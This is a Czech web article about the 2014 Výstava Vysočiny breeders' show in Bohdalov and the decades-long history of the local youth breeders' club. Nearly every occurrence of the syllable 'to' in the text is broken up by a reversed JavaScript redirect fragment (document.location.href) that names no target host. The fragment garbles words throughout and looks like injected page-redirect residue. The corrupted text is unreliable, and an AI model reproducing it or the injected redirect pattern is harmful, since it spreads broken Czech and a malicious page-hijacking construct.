Výstava Vysočiny Bohdalov
Rainbow page separator

Výstava Vysočiny a chovatelská mládež v Bohdalově

Neděle, 9. listopadu 2014

V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce měli chovatelé, ale i široká veřejnost, možnost již po osmnácté navštívit v okolí bohdalovského kulturního domu chovatelskou výstavu. Mohli své oči potěšit nejenom pohledem na roz[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];todivná plemena králíků, drůbeže, holubů, exotického ptactva, ovcí a koz, ale i prasátek, skotu či koní a řady dalších druhů zvířat. Mnohá z nich si také mohli zakoupit, stejně jako spoustu chovatelských potřeb nebo další produkty na farmářských a řemeslných trzích, které se zde také konají. Výstava je doplněna o bohatý doprovodný program, při kterém je možnost se mnoho nového dozvědět.

Výstava Vysočiny 2014 BohdalovPořadatelem zmiňované výstavy je bohdalovská základní organizace Českého svazu chovatelů, která si v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce připomněla 65. let od svého založení. Bylo nám pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velkou ctí, že jsme mohli při té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti předat jednomu ze zakládajících členů organizace a dlouholetému tajemníkovi organizace, panu Josefu Boháčkovi, zlatý odznak – nejvyšší vyznamenání ČSCH. Pan Boháček shodou okolností za čtrnáct dní po výstavě oslavil také významné životní jubileum – devadesát let svého života.
 
Výstava Vysočiny 2014 BohdalovTen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rok si bohdalovská chovatelská organizace připomíná také 50. let od založení prvního chovatelského kroužku. V roce 1964 se jeho vedení ujal ředitel místní základní školy František Blaha. Bohužel ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to učitel po několika letech odešel z Bohdalova a chovatelský kroužek svoji činnost ukončil. I těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pár let však stačilo, aby k chovatelství pevně připoutal dlouholetého předsedu bohdalovské, ale po řadu let i okresní chovatelské organizace.
 
V dubnu 1974 se vedení kroužku ujal Ing. Vladimír Hlávka. V počátku byl kroužek jen pro králíkáře a holubáře, později přibyli ještě chovatelé exotického ptactva a drůbeže. V roce 1975 se poprvé mladí chovatelé z naší organizace zúčastnili národního kola soutěže chovatelské dovednosti mladých a hned přivezli jedno medailové mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Možná i [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přispělo k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že někdo připomněl pos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toj Ing. Hlávky (vojáka z povolání) k událostem v roce 1968, a ten nemohl dál pokračovat ve vedení chovatelského kroužku, který v roce 1976 ukončil svoji činnost. Někteří mladí chovatelé však v chovatelství pokračovali. V roce 1979 se dva mladí chovatelé opět zúčastnili národního kola pod vedením Františka Musila.
 
Výstava Vysočiny 2014 BohdalovV roce 1980 byla činnost kroužku obnovena. Jeho vedení se ujal Pavel Promberger, odchovanec předchozího kroužku. Mladí chovatelé se opět začali zúčastňovat národních kol SCHDM a úspěchy, i ty nejvyšší – v podobě národních vítězů soutěže chovatelské dovednosti mladých, na sebe nenechaly dlouho čekat. Do bohdalovské organizace je od té doby přivezla řada mladých chovatelů.
 
V roce 1988 převzala vedení kroužku Marie Ondráková, která ho během studia vedla deset let. Později se ve vedení kroužku vystřídali Pavel a Iveta Prombergerovi. A dnes jej vede opět nejmladší generace těch, kteří si kroužkem prošli – Jiří Boháček, David Chalupa a Michaela Bradáčová.
Výstava Vysočiny 2014 BohdalovKdyž tehdejší ředitel bohdalovské základní školy zakládal chovatelský kroužek, ani ve snu si nemohl představit, jakou tradici práce s chovatelskou mládeží v Bohdalově založí, ale také jak tím ovlivní chovatele v bohdalovské základní organizaci a i v širokém okolí. Příkladem může být místní zemědělský podnik, jehož velká část zootechniků chovatelským kroužkem prošla a získala zde první teoretické i praktické znalosti o chovu zvířat.

 
Výstava Vysočiny 2014 BohdalovDnes patří ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to podnik mezi nejlepší podniky v chovu skotu v České republice. Zřejmě i díky té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nadšené práci jednoho člověka před půls[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletím, získávají v posledních letech na bohdalovské výstavě praktické zkušenosti s posuzováním drobných zvířat studenti Mendelovy univerzity v Brně. Můžeme také říci, že za tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počinem s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí i úspěšná chovatelská činnost bohdalovské organizace a že by bez něho zřejmě nebyla ani Výstava Vysočiny, na kterou se každoročně sjíždí velké množství návštěvníků nejen z České republiky, ale i ze zahraničí.